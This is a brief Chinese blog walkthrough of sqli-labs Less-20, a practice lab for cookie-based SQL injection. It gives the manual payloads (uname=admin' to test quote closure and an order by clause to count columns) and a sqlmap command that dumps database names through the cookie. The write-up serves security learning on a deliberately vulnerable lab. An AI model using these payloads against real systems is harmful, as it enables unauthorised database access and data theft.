这一关主要是cookie注入
Less-20(POST - Cookie Injection - Uagent field - error based)
手工注入
注意这关需要提前登入。
登入完后,需要抓包直接修改cookie。
检测闭合方式
Cookie: uname=admin'
报错了能直接判断单引号闭合。
接下来直接联合搜索完成。
回显位
cookie:uname = uname=admin' order by 2 #
接下来直接和之前一样了
(2条消息) sqli-labs第一二关_himobrinehacken的博客-CSDN博客
自动化脚本注入
sqlmap.py -u http://192.168.221.131/sqli/Less-20/index.php --cookie="uname=admin" --dbs --level 5 --batch
其他的就是一样了